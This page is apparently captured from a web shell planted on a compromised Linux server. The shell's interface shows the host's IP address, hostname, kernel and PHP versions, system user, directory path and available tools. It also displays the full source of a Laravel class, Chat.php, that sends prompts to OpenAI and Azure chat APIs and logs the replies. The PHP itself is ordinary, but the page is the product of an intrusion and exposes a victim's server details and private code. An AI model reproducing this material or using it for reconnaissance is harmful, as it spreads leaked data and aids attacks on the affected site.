Ngiler SH3LL 360
Home
Information
Create File
Create Folder
:
/
home
/
tbf
/
tbfguestbe.tbf.ro
/
app
/
Managers
/
OpenAI
/
Information Server
MySQL :
OFF
Perl :
OFF
CURL :
ON
WGET :
OFF
PKEXEC :
OFF
Directive
Local Value
IP Address
89.40.16.97
System
Linux server.atelieruldeit.ro 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User
tbf
PHP Version
7.3.33
Software
Apache
Doc root
Writable
close
Edit File :
Chat.php
| Size :
16.61
KB
Copy
<?php namespace App\Managers\OpenAI; use App\Managers\LogManager; use App\Managers\PromptManager; use App\Models\AiLog; use App\Models\Instance; use App\Models\Project; use App\Models\Prompt; use GuzzleHttp\Client; use Illuminate\Database\Eloquent\Collection; use Illuminate\Support\Facades\Cache; use Mis3085\Tiktoken\Facades\Tiktoken; class Chat extends RequestUri { /** * The user input. */ private ?string $userInput; /** * The context for the chat. */ private ?int $contextId; /** * The ai model for the chat. */ private ?string $aiModel; /** * The temperature for the chat. */ private ?float $aiTemperature; /** * The max token for the chat. */ private ?int $aiMaxToken; /** * The top P for the chat. */ private ?int $topP; /** * The Frequency penalty for the chat. */ private ?float $frequencyPenalty; /** * The Presence penalty for the chat. */ private ?float $presencePenalty; /** * The Client request for the chat. */ private ?Client $client; /** * The prompt id who is asking for this call */ private ?int $promptId; /** * The is_test attribute. */ private ?bool $isTest; /** * The JSON schema for the chat. */ private ?string $schema; /** * The system input if exists before chat start */ private ?string $systemInput; /** * The instance_id sent in options */ private ?int $instanceId; /** * The return_content_type sent in options */ private ?string $returnContentType; /** * The ai_account sent in options */ private ?string $aiAccount; /** * The resource_id se refera la resursa principala pentru care se executa promptul */ private ?int $resourceId; /** * The number of tokens calculated by Tiktoken library */ private ?int $tokens; /** * Variable use for retries call to openai */ private $retryCount; private $maxRetries; private $backoffFactor; /** * Json sent in Openai api body */ private $json; /** * The config value to use round-robin tehnic for change ai account for each call */ private $alternateAccounts; /** * Creates a Client instance with the given API token. * * @param string $userInput, * @param array $options, * @param ?Project $project, * @param int|null $contextId */ public function __construct(string $userInput, array $options, int $contextId = null) { $this->userInput = $userInput; $this->systemInput = $options && isset($options['system_input']) ? $options['system_input'] : ''; $this->returnContentType = $options && isset($options['return_content_type']) ? $options['return_content_type'] : ''; $this->contextId = $contextId; $this->isTest = $options && isset($options['is_test']) ? $options['is_test'] : false; $this->aiModel = $options && !is_null($options['ai_model']) ? $options['ai_model'] : ''; $this->aiTemperature = $options && !is_null($options['ai_temperature']) ? $options['ai_temperature'] : 0.7; $this->aiMaxToken = $options && !is_null($options['max_tokens']) ? $options['max_tokens'] : 14000; $this->topP = $options && !is_null($options['top_p']) ? $options['top_p'] : 1; $this->frequencyPenalty = $options && !is_null($options['frequency_penalty']) ? $options['frequency_penalty'] : 0; $this->presencePenalty = $options && !is_null($options['presence_penalty']) ? $options['presence_penalty'] : 1; $this->schema = $options && !is_null($options['return_json_schema']) ? $options['return_json_schema'] : null; $this->instanceId = $options && isset($options['instance_id']) ? $options['instance_id'] : null; $this->promptId = $options && isset($options['prompt_id']) ? $options['prompt_id'] : null; $this->aiAccount = $options && !is_null($options['ai_account']) ? $options['ai_account'] : null; $this->resourceId = $options && isset($options['resource_id']) ? $options['resource_id'] : null; $this->retryCount = 1; $this->maxRetries = config('app.openai_max_retries'); // Numărul maxim de reîncercări $this->backoffFactor = config('app.openai_retry_backoff_factor'); $this->alternateAccounts = config('app.openai_alternate_accounts'); if (!Cache::has('ai_account')) { Cache::forever('ai_account', Prompt::$aiAccounts[0]); } } /** * Creates a completion for the chat message * * @see https://platform.openai.com/docs/api-reference/chat/create */ public function create() { $this->json = $this->buildRequestJson(); while ($this->retryCount <= $this->maxRetries) { try { $uri = $this->getApiUri($this->retryCount); $response = $this->sendRequest($uri); if ($response) { return $this->handleSuccessResponse($response); } break; } catch (\Exception $e) { if ($this->shouldRetry($e)) { $this->handleRetry($e, $uri); $this->retryCount++; } else { $this->handleError($e); break; } } } return $this->handleInconsistentResponse(); } /** * Build the JSON request data for the chat message. * * @return array */ private function buildRequestJson() { self::getContextId(); $aiLogs = self::getHistory(); $systemInput = self::getSystemInput($aiLogs); $message = self::buildConversation($aiLogs, $systemInput); $this->tokens = Tiktoken::count($systemInput . $this->userInput); $json = [ 'temperature' => $this->aiTemperature, 'max_tokens' => $this->getMaxToken(), "messages" => $message, "top_p" => $this->topP, "frequency_penalty" => $this->frequencyPenalty, "presence_penalty" => $this->presencePenalty, ]; if ($this->schema && $this->returnContentType != 'text_json') { $schema = json_decode($this->schema); $json['functions'] = [ ['name' => 'get_response', 'parameters' => $schema] ]; $json['function_call'] = ['name' => 'get_response']; } return $json; } /** * Return max_token, but limit to maxim for aiModel * * @return int */ private function getMaxToken() { if ($this->aiAccount == Prompt::AI_ACCOUNT_AZURE) { return $this->aiMaxToken < 28000 ? $this->aiMaxToken : 28000; } elseif ($this->aiAccount == Prompt::AI_ACCOUNT_AZURE) { return $this->aiMaxToken < 7000 ? $this->aiMaxToken : 7000; } elseif ($this->aiModel == 'gpt-3.5-turbo-16k') { return $this->aiMaxToken < 15000 ? $this->aiMaxToken : 15000; } elseif ($this->aiModel == 'gpt-4') { return $this->aiMaxToken < 7800 ? $this->aiMaxToken : 7800; } else { return $this->aiMaxToken < 7800 ? $this->aiMaxToken : 7800; } } /** * Determine the API URI based on configuration and retry count. * * @return string */ private function getApiUri() { if ($this->alternateAccounts && $this->aiAccount != Prompt::AI_ACCOUNT_AZURE) { $this->aiAccount = Cache::get('ai_account'); } if ($this->tokens+$this->aiMaxToken > 7000) { $this->aiAccount = Prompt::AI_ACCOUNT_AZURE; $uri = config('app.openai_api_url_azure') . 'openai/deployments/' . config('app.openai_api_deployment_name_azure') . '/chat/completions?api-version=' . config('app.openai_api_version_azure'); } else { switch ($this->aiAccount) { case Prompt::AI_ACCOUNT_AZURE: $uri = config('app.openai_api_url_azure') . 'openai/deployments/' . config('app.openai_api_deployment_name_azure') . '/chat/completions?api-version=' . config('app.openai_api_version_azure'); break; case Prompt::AI_ACCOUNT_AZURE_2: $uri = config('app.openai_api_url_azure_2') . 'openai/deployments/' . config('app.openai_api_deployment_name_azure_2') . '/chat/completions?api-version=' . config('app.openai_api_version_azure_2'); break; case Prompt::AI_ACCOUNT_2: $this->aiAccount = Prompt::AI_ACCOUNT_2; $uri = 'chat/completions'; break; case Prompt::AI_ACCOUNT_3: $this->aiAccount = Prompt::AI_ACCOUNT_3; $uri = 'chat/completions'; break; default: $this->aiAccount = Prompt::AI_ACCOUNT_1; $uri = 'chat/completions'; break; } } if ($this->retryCount >= 2) { $uri = 'chat/completions'; switch ($this->retryCount) { case 2: $this->aiAccount = Prompt::AI_ACCOUNT_2; break; case 3: $this->aiAccount = Prompt::AI_ACCOUNT_3; break; case 4: $this->aiAccount = Prompt::AI_ACCOUNT_AZURE_2; $uri = config('app.openai_api_url_azure_2') . 'openai/deployments/' . config('app.openai_api_deployment_name_azure_2') . '/chat/completions?api-version=' . config('app.openai_api_version_azure_2'); break; case 5: $this->aiAccount = Prompt::AI_ACCOUNT_AZURE; $uri = config('app.openai_api_url_azure') . 'openai/deployments/' . config('app.openai_api_deployment_name_azure') . '/chat/completions?api-version=' . config('app.openai_api_version_azure'); break; case 6: $this->aiAccount = Prompt::AI_ACCOUNT_1; break; } } if ($this->alternateAccounts && $this->aiAccount != Prompt::AI_ACCOUNT_AZURE) { $currentValue = Cache::get('ai_account'); $currentIndex = array_search($currentValue, Prompt::$aiAccounts); if ($currentIndex !== false) { $nextIndex = ($currentIndex === count(Prompt::$aiAccounts) - 1) ? 0 : $currentIndex + 1; $nextValue = Prompt::$aiAccounts[$nextIndex]; Cache::forever('ai_account', $nextValue); } else { Cache::forever('ai_account', Prompt::$aiAccounts[0]); } } return $uri; } /** * Send the HTTP request to the API and return the response. * * @param string $uri * @return mixed */ private function sendRequest($uri) { if ($this->aiAccount === Prompt::AI_ACCOUNT_AZURE || $this->aiAccount === Prompt::AI_ACCOUNT_AZURE_2) { unset($this->json['model']); } else { $this->json['model'] = $this->aiModel; } $this->client = self::setupRequest($this->aiAccount); $response = $this->client->post($uri, [ 'json' => $this->json ]); return $response; } /** * Determine if the exception should trigger a retry. * * @param \Exception $e * @return bool */ private function shouldRetry($e) { $status = null; try { $status = $e->getResponse()->getStatusCode(); } catch (\Throwable $th) { } if ($status == 400) { // token limit is reached $this->tokens = 9000; // setez numarul de tokeni mare ca sa il fortez sa intre pe azure return true; } if (in_array($status, [401, 429, 502, 503])) { return true; } return false; } /** * Handle a retry attempt, including logging and exponential backoff. * * @param \Exception $e * @param string $uri */ private function handleRetry($e, $uri) { $logAdditionalData = [ 'retryCount' => $this->retryCount, 'error' => $e, 'backoffFactor' => $this->backoffFactor, 'json' => $this->json, 'instanceId' => $this->instanceId, 'client' => $this->client, 'uri' => $uri, 'account' => $this->aiAccount ]; $status = $e->getResponse()->getStatusCode(); if ($status === 401) { LogManager::writeAiRetryResponseLog('warning', $logAdditionalData); } elseif (in_array($status, [400, 401, 429, 502, 503])) { LogManager::writeAiServiceErrorLog('error', $logAdditionalData); } sleep($this->backoffFactor ** $this->retryCount); } /** * Handle other types of errors. * * @param \Exception $e * @return bool */ private function handleError($e) { LogManager::writeAiServiceErrorLog('error', ['error' => $e, 'json' => $this->json, 'instanceId' => $this->instanceId]); return false; } /** * Handle a successful API response. * * @param mixed $response * @return array */ private function handleSuccessResponse($response) { $body = $response->getBody(); $content = json_decode($body, true); $isJson = false; $completedText = null; if (isset($content['choices']) && isset($content['choices'][0]['message']) && isset($content['choices'][0]['message']['content'])) { $completedText = $content['choices'][0]['message']['content']; } if (is_null($completedText)) { $completedText = $content['choices'][0]['message']['function_call']['arguments']; $isJson = true; } if ($content['id']) { $aiLog = self::store($content, $this->systemInput, $completedText, $response->getHeaders()); } if ($this->schema && !$isJson && $this->returnContentType == 'text_json') { $completedText = $this->getResponseInJson($completedText); } if ($this->schema && $isJson) { if (!json_decode($completedText, true)) { // daca nu recunoaste jsonul, scot caracterele speciale (newline, tab etc) si le inlocuisc cu ' '; $pattern = '/\s+/'; $completedTextWithoutWrongSpaces = preg_replace($pattern, ' ', $completedText); if (!json_decode($completedTextWithoutWrongSpaces, true)) { LogManager::writeAiWrongJsonResponseLog('warning', ['promptId' => $this->promptId, 'instanceId' => $this->instanceId]); $completedText = $this->tryToFixJsonResponse($completedText); } else { $completedText = $completedTextWithoutWrongSpaces; } } } return [ 'content' => $completedText, 'context_id' => $this->contextId, 'ai_log_id' => isset($aiLog) ? $aiLog->id : null, ]; } /** * Make another call to transform text in json */ private function getResponseInJson($result) { $instance = Instance::find($this->instanceId); $result = PromptManager::generateJsonFromText($result, $this->promptId, $instance); return $result; } /** * Make another call to AI for fixing the error in json structure */ private function tryToFixJsonResponse($result) { $instance = Instance::find($this->instanceId); $result = PromptManager::generateCorrectJson($result, $this->promptId, $instance); return $result; } /** * Handle the case where all retries fail. * * @return array */ private function handleInconsistentResponse() { LogManager::writeAiWrongResponseLog('warning', ['promptId' => $this->promptId, 'instanceId' => $this->instanceId]); return [ 'status' => 'error', 'content' => '', 'message' => 'Ceva nu a mers bine la generare!' ]; } private function store($content, $systemInput, $completedText, $responseHeader) { $authUser = auth()->user() ?? null; if ($authUser) { $instanceId = $authUser->instance->id; } else { $instanceId = $this->instanceId; } $softModelType = AiLog::SOFT_MODEL_TYPE['procedure']; $aiLog = AiLog::create([ 'ai_account' => $this->aiAccount, 'resource_id' => $this->resourceId ?? null, 'instance_id' => $instanceId ?? null, 'user_id' => $authUser ? $authUser->id : null, 'prompt_id' => $this->promptId ?? null, 'app_model_type' => $softModelType, 'context_id' => $this->contextId, 'is_test' => $this->isTest, 'temperature' => $this->aiTemperature, 'max_tokens' => $this->aiMaxToken, 'object' => $content['object'], 'ai_model' => $content['model'], 'prompt_tokens' => $content['usage']['prompt_tokens'], 'completion_tokens' => $content['usage']['completion_tokens'], 'total_tokens' => $content['usage']['total_tokens'], 'system' => $systemInput, 'user_input' => $this->userInput, 'assistant_message' => $completedText, 'finish_reason' => $content['choices'][0]['finish_reason'], 'response_index' => $content['choices'][0]['index'], 'response_header' => $responseHeader ?? null, ]); return $aiLog; } /** * Construct system input for chat * * @param Collection $aiLogs */ private function getSystemInput(Collection $aiLogs) { $systemInput = $this->systemInput ? $this->systemInput : ''; if ($aiLogs->first()) { $systemInput = $aiLogs->first()->system; } return $systemInput; } /** * Get history for building context for chat from AILog * * @return Collection $aiLogs */ private function getHistory() { $aiLogs = AiLog::where('context_id', $this->contextId)->orderBy('id')->get(); return $aiLogs; } /** * Construct context_id if not exists */ private function getContextId() { if (!$this->contextId) { $lastContext = AiLog::select('context_id')->orderBy('context_id', 'desc')->first(); if ($lastContext) { $lastContextId = AiLog::select('context_id')->orderBy('context_id', 'desc')->first()->context_id; } $this->contextId = ($lastContextId ?? 0) + 1; } } /** * Construct conversation history * * @param Collection $aiLogs * @param string $systemInput */ private function buildConversation(Collection $aiLogs, string $systemInput) { $conversation = []; array_push($conversation, ["role" => "system", "content" => $systemInput]); $aiLogs->each(function($item) use(&$conversation) { array_push($conversation, ["role" => "user", "content" => $item->user_input], ["role" => "assistant", "content" => $item->assistant_message] ); }); $message = [ ...$conversation, ["role" => "user", "content" => $this->userInput] ]; return $message; } }
Back